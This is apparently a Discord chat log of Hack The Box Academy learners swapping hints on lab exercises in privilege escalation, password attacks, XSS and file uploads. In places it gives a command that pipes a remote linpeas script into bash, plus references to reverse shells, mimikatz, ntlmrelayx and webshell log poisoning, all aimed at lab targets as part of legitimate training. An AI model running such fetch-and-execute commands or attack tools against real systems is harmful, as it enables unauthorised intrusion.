#modules
Just tested for you, works fine for me
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
You can read my link above
@rustic sage Yes, and got: Error: Internal Error, ordering was unable to handle the media swap
Thank you
hello can anyone help me in password attack new skill assessment
Yes, when running sudo apt install dislocker
And it just runs from any directory, like it's on the path?
What do you need help with?
i got some creds and i've been trying for DAYS to find something to do with them, so if you can nudge a little in the right direction i'll appreciate it
You can DM.
Guys any help will be much appreciated, I've been stuck on credentials hunting in network shares in password attack module please please please help
I have answered first question but the second one i cant. I found the second user through rdp using given mendres credentials i cant enumerate the shares and permission with second user but cant find the password for administrator
i'm in the same place, I have the password, but not sure if it changed, plus i don't see any "domain" users....
I have two hints for you,
Hint 1 || use all the tools mentioned on that page of module ||
Hint 2 || Enumerate and read everything in IT share, there is some juicy info that can help, not sure if that is intended ||
please whoever wants to help I will be very grateful
That isn't what this discord is about.
can someone help me with the zap fuzzer section please? because I don't know where or I'm supposed to learned to; (use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames)
I've been stuck here since my earlier question
where can I go to learn how to use ZAP to fuzz for different md5 hashed usernames
I am not getting a request with a cookie. every time I enter the ip in for the URL that this section provides, there are no cookies in the request
so how do I send the proper correct url that is going to have a cookie in the request so I can fuzz
did you visit ip:port/skills?
Read the question again 😅
The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.
/skills/
seriously not trying to be upset because i have been stuck for so long and read this question for 5 hrs
guide through this like i'm 12 because how else am I supposed to read it
go to: <ip>:<port>/skills
find cookie
use rules to fuzz cookie
it's all explained in the section how to do all this
HOW?
Gotta be more specific which part's tripping you up
Do I fuzz the request?
yeap
it sets the cookie in the response not the request
first time you visit: it sees you have no cookie, it gives you one
second time you visit: it sees the cookie
DAMN!
smh feel so stupid
i am able to proceed. thank you for your patience because boy I was over here about to pop a vein
hi all, for module 35 section 223 (web requests, page 4 http headers) what site am i supposed to visit?
the default one when i open up firefox gives me an error
the question says the server will load the flag after the page is loaded, but i dont understand what page - unless its the default, in which case it seems broken for me
There should be a target you can spawn at the bottom of the page.
ahhhh ok it might be silly but i did not expect to have to go to that page
it worked, thanks
anyone down to review my CPTS report example ?
Report Reviews are no longer allowed unfortunately
its for the module documentation & reporting
same answer
bruh
Are you saying we cannot send report of AEN module to someone who has already completed CPTS for review?
Correct
Why though?
I was hoping I could practice report writing in this module and get feedback on places that required improvement.
@proud pine Did they specify the reason why asked you to stop reviewing report?
They feel like it was a violation of the TOS
I always felt like it wasn't any different than what generally goes on in this channel, but they disagreed.
As long as it's just the module report. There shouldn't be a problem to get help, especially from those that already hold CPTS
That was the idea. A few of us did them, who all had the cert role.
but unfortunately no, they put a full stop to it.
they are weird sometimes
Can anyone help me in password attacks skill assessment i got into bdavid machine using evilwinrm on jump01 but now i seem to be stuck
Two hints: check his privilege and reread the skill assessment text
can i dm u
Yup
😦
sure
hi guys!! anyone who can check the lab for "HTTP Response Splitting" and can make a sanity check whether the admin visit the link because i have the payload working for me and i know how to write the admin cookie without an external server but get nothing back, i tried double and triple encoding, still didn't work
i can write anything i want through the xss to the log with my own user but nothing with admin user. I even set a cookie for my user and i can via CRLF XSS write it to the log
i tried multiple url encoding
Hey, did you set up pivot? I have no luck with ligolo and chisel from my machine and pwn box also...
ligolo is working on password attacks new skill assessment
Ngl, the secrecy around a lot of the exam really put me off taking it. It feels like even what one would consider basic information about the exam is locked behind ToS so that people will just jump in, fail and buy more vouchers.
anyone can help me regarding this?
Ligolo is working but nmap scan for hosts mentioned in lab description shows:
All 1000 scanned ports on 172.16.119.11 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
All 1000 scanned ports on 172.16.119.13 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
weird my nmap was showing results
Hello I am stuck at Brute force Skill Assessment. I completed Part 1 and found out correct user name using hydra. I used the same username on Part 2 and used medusa for ssh service. Although they are telling ftp user basically it ssh port (found out by nmap). I also successfully found out password using medusa. But can not find correct answer for both questions on part 2. Please help me
hmm hello guys, can anyone recommend me a beginner roadmap/list to start? i feel so overwhelming
Hello, can I ask a question? The question is, don't you notice that when you stop doing active machines in HTB, the points stop increasing? I mean, you have to do about 3 machines to see the progress.
Installing odat.py
for the people who have issues with oracle tns installing odat:
start a virtual environment:
python3 -m venv venv
source it:
source venv/bin/activate
then install it with:
```
#!/bin/bash
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome
pip3 install pyasyncore
```
and now it should work.
You can run it with source venv/bin/activate and then run python3 odat.py.
Or you can run it with: ./venv/bin/python3 odat.py
(of course initiate the venv when running)
and if it doesnt work for you, dm me with a screenshot
You are on Ubuntu 24.04
Since you are already heads deep into this, I am a ubuntu user, so here is how I did it to fix some dependency issues:
In case of missing libaio1:
sudo apt-get install libaio1 -y && sudo ln -s /usr/lib/x86_64-linux-gnu/libaio.so.1t64.0.2 /usr/lib/x86_64-linux-gnu/libaio.so.1 && sudo ldconfig
Which would fix the issue of missing libaio1.
@slate zinc pin it plez
Hey, im working on the privilege escalation section in the getting started module (module/77/section/844). I managed to do the first task and move to user2, however, im unsure on how to proceed next. I need root access, but i'm not sure how to get there
i dont get how to run linPEAS on the machine
client_loop: send disconnect: Broken pipe is it supposed to do this on the lpe skills assessment when logging in via ssh it just keeps logging me out?
I am stuck on the windows privilege escalation skill assessment part 1.
I got the revshell on the machine, enumerated privileges, checked common folders, etc. Cant find anything about an ldap admin.
I tried using the juicy potato and stuff but to no avail. I then tried using some CVE to create a new account and even tho i ran it and didnt get an error, i was not able to do anything with it, it never even made the account.
I feel like i spend like 2 hours going down the wrong rabbit hole and havent even gotten to question 2 yet.
i've tried hosting it on a http server but i cant get a connection to it from the remote host
I need help with Credential Hunting in Network Shares for both questions. I am so lost, i have tried running both Snaffler.exe and Powerhuntshares but to no avail.
There are a shit load of different ways to transfer files between machines. Go to the File Transfers module and use methods in there. Remember to chmod +x linpeas when you run it with ./linpeas.sh
you can, smb, copy paste into nano, http server, scp, ftp, etc.
I see, thanks. I’ll have a look again later 👍🏻
You can DM if you're still stuck.
Hey, tried this and managed to get the script on the remote host. I get the error "temporary failure in name resolution" when i try to run it though
hey guys, if anyone can help me with the logrotten section of linux priv esc module it would be appreciated. I've tried having the payload do a reverse shell and move the file im trying to read, but both arent getting executed, even though its telling me its writing the payload. thanks
omg nvm literally ran it once more and worked
its like a 1 in 20 chance
apparently so
sorry to ping you, but would you be able to point me in the right direction in my task? im doing the Privilege Escalation section in the getting started module, but i keep having issues with linpeas
don't use linpeas then?
what else am i supposed to use?
nvm ill try linEnum
on what are you stuck?
?
the module wants me to use a script... which wont work
the hint is "dont forget to chmod"
I can know what are u doing
chmod +x script.sh
ive done it already, i get the error "temporary failure in name resolution"
Be more specific?
when trying to run the linpeas script
check your vpn
oh wait
you are running linpeas.sh? And how are you running it?
Are you trying to directly execute linpeas with a oneliner, instead of transferring the script to the machine?
are you running it remote?
Like for example curl yourip:port/linpeas.sh | bash?
i used wget -o
then the github site
yea thats the issue
the box does not have internet access
you have to download it to your own machine, and then transfer it from the machine to the box
how? i tried hosting it with python3 -m http.server
but i couldnt get a connection
ill give you some commands
thanks :)
on your machine
get the linpeas.sh
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh
Now transfer it:
cd /tmp && python3 -m http.server 1337
on the target machine
curl -s http://yourip:1337/linpeas.sh | bash
there you go, that should run it
thanks, ill give it a try. i've gotta use the tun0 ip, right?
yes
but this is common sense, so if you don't understand this yet, i'd recommend diving deeper into the basics of linux
it didnt work, i didnt get any output at all.
maybe theres some configuration with my firewall that messes things up?
mind sending screenshots and/or command output?
sure, no problem.
hold on a sec
it didnt give any output at all, i also tried just running curl http://ip:port and the same thing there
first of all i'd recommend using a VM, to prevent breaking your system after some time installing tools
The target cannot reach you, you are attempting to download a file using the IP address of the VPN, whereas the target doesn't know and is not associated with it. The target is a docker container.
yea you should look at your interfaces again, the docker should have its own interface (if you are running this container locally)
i usually do, i installed this system a while ago just to see how linux was, and tried to do some of the tasks on here since i could
The docker container is not configured in a way that allows you to download files over the internet
finally.... i just copy pasted the script and used vim
also very possible 😛
but when in a reverseshell, its not really easy to execute something like vim or nano
since it would not render good
what are those errors? I'm a step ahead of you, installed all the necessaries to mount the vhd file, but I do not have the password to decrypt it with dislocker cmd. Do you have the password to unzip the "*.zip" file from the previous question?
Hello Evan, I'm trying to mount the vhd file, but I don't have the password from the previous question to decrypt it (i had already solved the first question before the modifications to this module applied 5 days ago more or less, and probably mine is outdated or not correct). Can you give it to me please via dm?
running into issues with it again, so ill try to fix it. otherwise i'll ask to remove the pin 😄. FIXED IT
hey, i am currently on module FILE UPLOAD ATTACKS, blacklists filters.
I am trying to use ffuf and not burpsuite to fuzz for the extension but im failing, i finished the exercise with burp.
Someone who did it using ffuf and can help with me the command and the file request ? i am seeking to solve it using ffuf ^^
i finally did it, thanks for the help. I found out i could just copy the private ssh key and log into root user with it
"I've been stuck in a cloud of confusion for over six months now, and it's eating away at me. Deep down, I know cybersecurity is what I want—it's what excites me, drives my curiosity, and gives me a sense of purpose. I want to become an ethical hacker. I’ve built up some knowledge of networking and tools, and I’ve even explored platforms like Kali Linux, Metasploit, Burp Suite, and Wireshark.
But the truth is… I feel lost.
Some days, I dive into bug bounty hunting, but I don’t understand what’s really going on—and I end up quitting. Other days, I jump into using tools like Metasploit or Burp Suite without even knowing why I’m using them. And then there are days when I go back to square one, starting with the basics all over again.
It’s like I’m running in circles, overwhelmed and directionless.
I don’t need more random videos or tools—I need a clear path, a step-by-step guide, a mentor to help me connect the dots. I want to stop wasting time and finally take control of my journey in ethical hacking. I know I’m passionate. I know I’m capable. I just need the right structure, support, and a solid roadmap to follow.
Please help me find that path
Do you resolve it?
the two file ccache are expired to 2022
I would have to see a screenshot of what you are doing.
I figured it out, thanks anyway :)
Damn 👀
i am getting in the response Extension not allowed/ Only images are allowed
Hi I am doing the SQLmap Essentials Skills Assessment challenge on hackthebox academy I am struggling to even find the right page to do the sql injection I checked all the pages and the forms to look for a post request to inject and I have also checked the burpsutie history for post request any tips?
These are both expected answers, the reading tells you about the difference between the two
Same here. Are you able to grab the flag?
What the Time Means (e.g., “2 hours”, “3 days”) ?!
Estimated time the module will take to complete?
I'm facing the same issue. Got flag?
ah! thanks
1 day = 8 hours
the time is a general estimate if you have 0 issues at all with the content and don't take your time reading and taking notes
thanks ! 👍
Hi,
I'm stuck on Introduction to Windows Evasion Techniques->Static Analysis, ThreatCheck print No threat found!, the log file in the VM say me
[06/09/2025 08:10:32] Checking...
[06/09/2025 08:10:32] C:\Alpha\Static\notMalware.exe - OK - Undetected by Microsoft Defender Antivirus
but the flag never appears.
Does anyone have any idea how to debug the problem ?
Make sure you follow the instructions precisely. The two things I notice people miss a lot is the type of program (C# .net console) and using debug version instead of release.
Hello! I am trying to set up Proxmox for the first time. When I enter the address it gave me it is timing out so I can not get into the web dashboard to complete the setup. Any suggestions?
Enumerate; have you clicked on everything?
Hi. I'm doing the Linux Privilege Escalation Skills Assassment and I'm having trouble with the machine... It randomly disconnects and when trying to log in again it fails several times until I can log in as htb-student. Is this part of the assignment? Already tried with reset
try changing vpn regions
currently EU vpn targets seem a bit overloaded
This was us-1. Changed to us-4 and it's slow but working
client_loop: send disconnect: Broken pipe
anyone had this error when logging in via ssh keeps logging me out with this error
yup try to ping the box you will see 1000+ ms from time to time
same exercise not working for me also bro
the box pings fine
bc i had the broken pipe error due to lag
tried changing vpn regions still the same
NTLM Relay Attacks Skills Assessment
Hi guys! Currently working on skill assessment here and got stuck on the question 4 for few days. Can I have a nudge? So far I understand it is something related to Farming Hashes even I have the sqlftp credential from question 3.
I'd look at what your currently harvested creds have access to and how you can use them with a service to relay hashes.
Hmm, I think I get what you mean, let me check back backup01 host, thanks!
If you still don't get anywhere you can DM.
Now the same is happening for us4, us2, us1... Have you found a region where it works?
hi
i am new to this server
i just got to know about hacker box
can one give me a run through or a guide to how to start doing ctf n all
lmao
No i havnt
Hello guys ! can I have an explanation of this question : How many incoming explicit object controllers exist in the Domain Users group? (It's from Bloodhound module, Analyzing BloodHound Data section)
so look up the info in your bloodhound? it's not a fixed number it depends of your data
"explicit object controllers " is one of the info you can get from the interface pretty easily "no need to make custom queries"
Is there anyone here who can teach me ethical hacking?
you know htb academy platform is made for that right
so this channel is for: https://academy.hackthebox.com/ , which is a platform with course modules, you can get a few starting modules for free, then you can either pay for module or take a monthly subscription to access the other modules
Would it be better to get a degree in computer science or cybersecurity?
If I want to work to security/ pentesting in the future?
read and follow #welcome and ask in #careers-and-certs
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@summer bronze ^
Anyone have tips for the Password Attacks - Credential Hunting in Network Shares module?
I've located the first set of credentials, answered the first question & am using the second account. I found a credential in one of the shares that the second user has access to that I thought was the answer to the 2nd question ... but it won't accept it as the answer so I guess not. I've run Snaffler as both users, PowerHuntShares & manual searches with the Powershell command shown in the module (various patterns related to credentials)
If someone could nudge me in the right direction I'd appreciate it
hey people, need a hint or help any kind on module Password Attack section Pass the Certificate, i dont know what am i doing wrong, im following steps and cant get ./DC01$.pfx cause connection goes down.
guys i stuck on Windows Privs Esc Skills Assessment Part1 when i try to download JuicyPotato on the Target VM and then try to execute it i get an error telling me "This version of C:\Users\Public\jp.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher." Why only me getting this error ?
even if i try other executable from other sources i get same issue, also tried to build the exe myself (same result and error)
i was about to ask the exact same thing, i would also appreciate a nudge
Can't capture the Beacon Message, where you can find at EAPOL. Wi-Fi Penetration Testing Basics - Skills Assessment
dm me
I'm still having the same issue... Already tried with: us-4, us-1, us-6, us-3, eu-3 and the problem is the same
manspider
Hello everyone! I am on the "Attacking Web Applications with Ffuf" module, on "Skills Assessment". I am stuck on third question saying "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?". I found the page but when I try to submit the answer it says "Wrong answer". I have tried submiting the full url (+port), url without port, url without port and without "http" in front and nothing seems to work. Does anyone have any suggestions?
anyone?
Hi, i have a question can anyone help to track someone bc someone create fake acc on ig with my photo and i want to know who is that
Hello, the host in exercise Attacking Windows Credential Manager is unstable as hell, is there any issue here ?
Thx
Have you tried nxc or manspider from the section?
If you are having a connection issue, it is usually suggested to switch up your connection, either by downloading a different VPN config file, switching the VPN region, disconnecting from VPN and trying it from pwnbox, etc.
Where did you get your version of JuicyPotato? I believe the section provides a link to the Git repo.
Solved it now. I hadn't been as thorough as I thought with searching the shares. Thanks for the tip.
Cool deal, great job!
mmmm kind... nmap is scanning good both ip. but the problem is impacket-ntlmrelayx and printerbug.py are not working for me and want to know if im doing something wrong. im just following step by step lesson
Ok, if you'd like you can DM your output from ntlmrelayx and printerbug
thanks a lot. will do
don't remember that module off the top of my head but is there a hostname you should've added to /etc/hosts?
that might be it
Thanks for the tip! Turns out that I did not read the hint correctly. I needed to replace the port in the url with the word PORT. In the end, it was easier than expected
no one can help you with that
this is for PenTesting, has nothing to do with ig accounts
NO
Lol
Hello, I know a little bit about networks and I really want to start learning cybersecurity and I don't really know what I need to learn to know and apply this field in vulnerabilities and defenses and I would be happy if I need to learn for this field.
In the field of pentesting, ethical hacker in and red teaming cybersecurity
I would love tips on how to start learning.
start from the beginning modules like learning process and so on and get deeper into the hacking world
thanks
you know when you gain new knowledge understand how things are going you will be discovering new things to learn and get deeper into the theme and you will understand yourself what you need to study what you want to study))
true you are right
Hey Guys, I am doing password attacks I am stuck at the new section: Attacking Windows Credential Manager One I have bypassed UAC but still even after system32 I get privilege error in mimikatz
I am able to log into mcharles and sadams with system32 but yea still get mimikatz error
And also running dpapi keys with mimikatz still it crashes
This is not the channel or server for that.
It just crashes
hey, sup? am I the only one not managing to connect to tombwatcher.htb via targetedKerberoast cuz "invalid credentials"?
This should be asked in #1380967904429871275
Hey anyone here can help with XSS module?
Session hijacking to be exact
Im confused about how to test a payload in each field. Am I supposed to have a listener running in my vm attack box?
Try using a different tool and method
Yes
You test each field to call back to your machine
y cant i message in general?
Follow #welcome instructions
oh thx
use python -m http.server port
Hey, currently doing the Attacking Windows Credential Manager section in the Password Attacks module, I have found the needed password using lazagne but was hoping someone could help me do it using mimikatz with UAC bypass
I mean its just the same thing but with mimikatz in an admin terminal using UAC bypass
Hey
Hello. Did anyone finished the "crackmapexec" module? i would have a few question on the skill assessment
I can't get past the IDS/IPS Evasion Firewall module. I've run everything on nmap and it always shows as filtered.
I tried this and more
Try checking service version
I did with -sV
Don't see that in either of your images
But always filtered
Reset target and try again? Maybe your earlier scans tripped the ids/ips
I have no access, as it seems, but thanks anyways
Read and follow #welcome to gain access
idk if I'm dumb or there's a bug. I am doing Linux Fundamentals and stuck on the question:
"Which kernel release is installed on the system? (Format: 1.22.3).
which I ran uname -a got 6.11.5 but tried every variant 6.11, 6.11.0, etc. even 6.11.5-1parrot1.
&
"What is the name of the network interface that MTU is set to 1500?"
which I ran ip link got ens3 & tun0 both were wrong even tried different variants like enp0s3 but none of them work. So idk if my work station is outdated or the questions/answers are or what's going on. Any knowers?
Are you ssh'd into the target?
I believe so that's the "Target(s): right?
yeah
yes I have my target, am I supposed to plug it into the workstation myself? I was under the impression you click it then open the station and it should be setup
You need to ssh into the target
ssh <target-username>@<target-ip> then put in the password that you're given
If you're using a personal VM you'd have to be connected to OpenVPN
thanks let me check
Hello
I never read welcome, lol (damn tdah)
Just started working through CPTS, reading about CT logs in the subdomain enumeration section. I'm pretty sure I'm misreading this - it looks like there's a public record of every subdomain? isn't this just significantly stronger than brute forcing the subdomain enumeration?
I must be missing something but I don't see what. There's no way that looking at Censys or cert.sh is just better than using gobuster / ffuf / etc
No, they don't hold public records for all subdomains. One example is you can have a wildcard *.domain cert that covers any subdomains you have. It doesn't list each individual sub domains.
Gotcha that makes sense, I was like this seems insane to have out in the open
ya so anytime I do the ssh htb-student@IP Address then it asks for the password in grey and doesn't let me type the password. I use the pwn box I even tried doing the IP number it gave me and just posting it in the web browser but that doesn't work either
I use windows on this pc and don't use a VPN, so should I not rely on the pwnbox?
I figured I was going to have to do this. The reason I am learning the Linux Fun. is so I can download Linux Arch on this thinkpad I bought to do all that stuff lol
wompwomp lmfao so I guess for this thinkpad I'll do that then buy a different one in the future to download arch
Yeaa
Lemme try the italin dish
and every time i do it ca01 ip's goes down
please don't share module info like passwords and such
Hello everyone I’m severely new to all this
Including using discord
I’m currently going through the recommended start path Information Security Foundations
Trying to set up the VM with virtualbox and proxmox but i have been unsuccessful so far getting prox to open in the box. Any help with this would be greatly appreciated as well as any tips on if im starting my cybersecurity journey correctly and what i should be learning or studying
you don't need to set up proxmox
the setting up module is more of a rough guide than a pure tutorial
Lol ok thanks I’ll continue on then
hey people, someone can help me trying to fix oscrypto from PtC and its not working
Hello everyone, I am stuck in password attacks ( https://academy.hackthebox.com/module/147/section/1391 ). can anyone help me pls?
from the git repo or by compiling it or even by copying the version in the lab section, all of them get same error on skills assessment part 1
Make sure you have SSH'ed into the target
Good Morning together, I need help with the "Fundamental Linux" module. I hope I'm right here!
I can't connect via SSH to the Docker Container and I really dont get the problem. I wanted to do an annual subscription and test some basic stuffs before. Thats the output:
```
└─$ ping 10.***
PING 10.1*** (10.129.170.232) 56(84) bytes of data.
64 bytes from ***: icmp_seq=1 ttl=63 time=54.7 ms
64 bytes from *** icmp_seq=2 ttl=63 time=37.8 ms
64 bytes from ****: icmp_seq=3 ttl=63 time=49.0 ms
^C
--- **** ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 37.802/47.168/54.656/7.007 ms
┌──(kali㉿kali)-[~]
└─$ nmap 10.***
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 03:59 EDT
Nmap scan report for 10.129.170.232
Host is up (0.037s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
┌──(kali㉿kali)-[~]
└─$ ssh htb-student@10.1****2
^C
┌──(kali㉿kali)-[~]
└─$ ssh htb-student@10***32 -p 22
^C
┌──(kali㉿kali)-[~]
└─$ nc 10.1****2 22
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
^C
```
Can you please mention the section and the question? From your output it seems ssh is responsive.
....
File Descriptors and Redirections - Question: How many files exist on the system that have the ".log" file extension?
Side note: Labs are working for me
Hmm interesting I tried and I can connect to SSH just fine.
I would suggest try connecting to ssh server through the pwn box. I suspect something might be wrong with your ssh client.
And I assume you have tried to restart the target if you haven't do try the classic turn it off and on again.
I tried this. But it also doesn't works. I also tried different VPN connection files... But it seems it must be a problem on my side, so I'll go for troubleshooting. Thank you very much 🙂
You tried using the pwn box and it didn't work?
Pwn box worked, but it feels different and was a little bit slow yesterday. maybe due high traffic in the evening
Oh yeah that's another issue, but as you mentioned the issue is on your end. So most likely some mess up with your ssh client.
You can also ssh into the pwn box if GUI feels slow and you need/want to use the pwn box.
Ok, I’ll take a look after it. Thank you very much 🙂
Good luck!
Try and adjust your tun interface MTU
Hi guys! Are there any modules on ROS2 security or anything similar?
LPE skills assessment is still broken for me how can i raise this issue?
what do you mean by broken? @sick depot
I did the module a few days ago, didn't have any issues
When i ssh in it logs me out straight away saying broken pipe
What vpn type are you on and on which region?
are you using pwnbox or your own vm?
works fine here on pwnbox
Hello! Im doing the module documentation and reporting, and got curious about the tools to report mentioned
I mostly use ms word or markdown
does anyone use another one, and like it?
a lot of people use SysReptor
Ive tried numerous different one have you tried doing a few commands for a minute or 2 it will then log u out
Maybe its best to contact support
Hi, might be the wrong channel but still gonna ask, anyone had issues with the flag in the NMAP Enumeration, Scripting Engine section?
my instance is still working and I just got flag 1
what sort of issues?
In short, i got the flag using -A -T4, but the flag is invalid.
Alright. Didnt think much about the flag in public
Which module do you need this for? Normally links are included in the modules if necessary
Hello, I'm taking the Password Attacks course and I'm in the section on attacking Windows credentials using Mimikatz. The problem is that I don't know where you run it, since the Windows Server machine doesn't have internet, I can't become an administrator because I don't have a password, and I don't know what to do.
I can log in with mcharles
But I dont know where I need to execute mimikatz.
Everything is taught in the section
No administrator access is needed 🙂
The example in the section is with the user administrator
Not all the questions are solved by copy/pasting the section's content
Yea, I know, but i dont know what I need to do
There's other tools mentioned
So, I dont need to use mimikatz
@storm elk best way to contact support?
Need some help? Learn how to reach the support team on Academy.
there's an email at the bottom - or via the live chat
i'm also stuck. did any moderator assist you?
Good morning everyone, I need help on the File Upload Attacks module, the Whitelist section. I have not been able to get a web shell, but I have tried everything the module suggests. I even tried to upload the web shell with every allowed extension. But it doesn't work and I don't know what I'm doing wrong.
i send you mp
I'm doing the Skills assessment for the WiFi Evil Twin Attacks and I'm confused on my last question. I have 2 of the 3 answers, but any attack I have tried so far I am not getting anywhere. I've tried the manual Evil Twin attack but apache isn't installed and I can't install it. The Karma and Mana attacks kinda seem to work but nothing gets written to a .hccapx file for me to convert it. It's a PSK Network, the only automated tool I have on this box is WifiPhisher and eaphammer, but neither taught about using against this type of network in the course.
I know I'm missing something, so please just give me a hint to help me out . If someone could point me in the right direction, that would be very helpful.
There is a "Hint" button on the right side of the question which would provide you a hint to solve the question.
I've looked at that, it says interception, but there's a few ways of intercepting it that were taught in this section and I've tried them but I feel like I am missing something as I get no results.
What section has that word in it?
If you follow the section you should get the flag.
SSL Interception, which I have been using with Ettercap but nothing shows up. I do get a host in there but when I begin the SSL Intercept and the ARP poisoning, nothing comes back.
But I will try again. Thank you
You need to make sure all clients are being connected to your rogue AP
If you want, you can DM what you have going on.
Hey guys I am working on the getting started module trying to solve the nibbles box. I haven't been able to look up the target ip. I have tried everything i could think of and used any information i could find. I am very new to this world and not very educated yet. Any tips would be very helpful. Thank you!
I need some help on Password Attacks section Credential Hunting in Network Shares
i tryna run the command like the instruction for PowerHuntShares but didn't work
Did you import it before trying to run the command provided in the section?
like this right?
Read the error and if you are unfamiliar with it, some Internet research should help you get around it.
and btw do u know what shares the first question is talking about? I have tried all 3 shares i can access to but nothing seems suitable
why is the academy VPN so slowwwwww
I did the entire lab using netexec. They have a great wiki if you are unfamiliar with it. It is briefly touched on in the section.
i bet someone is mining monero on academy machines
can someone give me a hint for question 2
I tried every files on the shares but cant find nothing but dummy credentials
There are keywords in the question.
i tried logon to the user i found
You can DM and we can chat about what you are trying/tried.
then recheck the shares folder i dont have permission from the previous user
Hey, a quick question: is there some specific rules when we submit an answer during a module's question ? I am sure of my answer (double check done on my side) but... not working... so, I really don't understand
If copying a flag, I would verify there aren't any leading and trailing spaces getting pasted with the flag.
Now, it's just a simple question:
And the answer is very easy (As said, I crossed check) but... Apparently not working
However, I am 100% sure of the answer
Can I submit the question here without precision of the module?
No I would not do that, but you can post the module/section and if I've done it, I can verify it for you. If I haven't done it, perhaps someone else can verify it for you.
Everything is mentioned in the module page, there are two techniques. If you want a more thorough understanding and alternative approach, give this link a read.
https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets
YARA & Sigma for SOC Analysts
Page 5
Hunting Evil with YARA (Linux Edition)
Can someone help me with this problem? I am for some reason not understanding what processes I am looking for when I do the yarascan.
hey, hello, i already completed this module. but thank you so much
Hello, hope you all have been well.
I'm reviewing File Inclusions today, and I am having an issue on "Server Log Poisoning".
I'm attempting to poison /var/log/apache2/access.log via BurpSuite
- Changed User Header to a PHP Webshell >> Send
It seems i'm either destroying or breaking the log file every time, not able to get the results shown.
(500 Internal Server Error)
Anyone got an idea what I could be doing wrong?
(Image deleted to redact IP)
hey guys i struggle with the module footprinting -> smb
i dont understand what they want from me in this question:
"What version of the SMB server is running on the target system? Submit the entire banner as the answer."
I can answer the other questions but i cant that one?
what is the "entire banner"?
I see like 3 different versions
nmap scans - 2-3 different ones on here
and there is a version on comment on smbshare
like im so confused??
nmap shows versions:
```
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
fingerprint-strings:
| GenericLines:
| 220 InFreight FTP v1.1
| Invalid command: try being more creative
| Invalid command: try being more creative
| NULL:
|_ 220 InFreight FTP v1.1
```
and on comment i see
sambashare READ ONLY InFreight SMB v3.1
there were some modules with similar questions and i feel like i just am able to answer them with luck sometimes bcs that example above happens to me more often now where i see different versions and i dont know what they want when they ask for entire banner i feel lost. would really appreciate some help
I think they want X.X.X as your answer
nmap -sV --script=banner <target>
Or you can also do it manually
nc $ip 445
The banner is usually the first line that a service responds with when initiating a connection. It contains the service name and version.
Since you already have the answer, this might explain better.
PORT STATE SERVICE | VERSION
139/tcp open netbios-ssn | Samba smbd 4.6.2
445/tcp open netbios-ssn | Samba smbd 4.6.2
@plain spruce
The question is asking for you to grab the entire banner of the "VERSION"
So copy everything after the PIPE ( | )
tried both of your approaches @vernal tapir @faint hamlet doesnt accept it.
i tried:
139/tcp open netbios-ssn Samba smbd 4.6.2
netbios-ssn Samba smbd 4.6.2
nvm this worked: Samba smbd 4.6.2
..
in my head the entire time
"139/tcp open netbios-ssn Samba smbd 4.6.2"
this is the entire banner.
not just "Samba smbd 4.6.2".
Did you already do Linux Fundamentals?
i did. and it says:
What version of the SMB server is running on the target system? Submit the entire banner as the answer.
"SUBMIT THE ENTIRE BANNER"
If not, highly recommend you do that
Yep, I know it's a little misleading for someone starting out, just to let you know majority of the questions are similar to that, requiring you to fully understand and read the questions. We all struggled through it at least once lol
i didnt, because i dont think i need it. i have a some experience on linux. the questions is just worded dumb imo.
It isn't the nmap scan doesn't print only banner
so the thing is i dont know what a banner is i guess?
if i see this as a answer from nmap:
445/tcp open netbios-ssn Samba smbd 4.6.2
how tf should i know that only the last part is the banner if i normally would think the whole thing would be a banner. maybe im just dumb i dont know
sorry for swearing btw. am kinda riled up because i sit on this question already for an hour.
No it's a issue that u don't know everyone learns, just that the banner is something else just printed in nmap format so question wasn't worded incorrectly
so can i like say that the last part of nmap scan outputs is always the banner or how do i identify a "banner"?
I don't think it is always banner, not sure tho
Two sure ways to identify are to manually connect to service for fingerprinting
nc $ip $port
Or
Using the banner script in nmap through above given command
the banner script still gives me the whole line there is barely any difference.
so i have to basically assume that the last part is the banner
or like u say connect manually and hope for a greetings msg?
also when i do this
nc $ip $port
it just loads in terminal and then just stops - nothing happens
Man, my last Skills Assessment took me 2.5 days of enumerating, 5 mins of exploitation.
@plain spruce You need to focus hard on trying to not get so frustrated, spending an hour trying to get an answer is annoying but you MUST be expecting it, and only be happy when you achieve the results, reflect back on WHY you spent that much time, and for next time try to always just do it better 🙂
yeah was just frustrated that i know i have the answer but dont know what they want from me thats all.
